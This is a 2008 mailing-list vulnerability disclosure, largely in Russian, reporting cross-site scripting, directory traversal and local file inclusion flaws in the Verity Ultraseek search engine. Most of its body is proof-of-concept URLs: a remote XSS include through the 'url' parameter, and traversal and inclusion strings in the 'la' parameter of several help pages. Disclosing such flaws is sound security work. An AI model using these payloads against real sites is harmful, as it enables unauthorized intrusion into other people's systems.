Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability

scribe 0.2 local file inclusion vulnerability

StatCounteX 3.0 & 3.1 Admin Vulnerability

StatCounteX 3.0 & 3.1 Admin Vulnerability

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	15.02.2008
Subject:	Vulnerabilities in Ultraseek

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, Directory Traversal и Local File Inclusion уязвимостях в Verity Ultraseek. Уязвима последняя версия движка (уязвимости проверены на официальном сайте разработчика данного поискового движка).

XSS: Remote HTML Include / Remote XSS Include:

http://site/highlight/index.html?url=="fixed">http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&
charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dt
est

Directory Traversal:

http://site/help/syntax.html?la=/../../index

http://site/help/searchtips.html?la=/../../index

http://site/help/refine.html?la=/../../index

http://site/help/special.html?la=/../../index

http://site/help/boolean.html?la=/../../index

http://site/help/meta.html?la=/../../index

Local File Inclusion:

http://site/help/syntax.html?la=/../query

http://site/help/searchtips.html?la=/../query

http://site/help/refine.html?la=/../query

http://site/help/special.html?la=/../query

http://site/help/boolean.html?la=/../query

http://site/help/meta.html?la=/../query

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1831/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua